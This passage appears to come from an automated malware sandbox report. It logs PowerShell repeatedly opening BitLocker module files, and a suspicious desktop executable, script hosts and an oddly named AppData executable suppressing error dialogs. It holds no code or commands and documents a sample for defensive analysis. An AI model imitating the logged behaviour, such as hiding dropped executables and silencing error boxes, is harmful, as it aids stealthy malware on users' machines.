                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
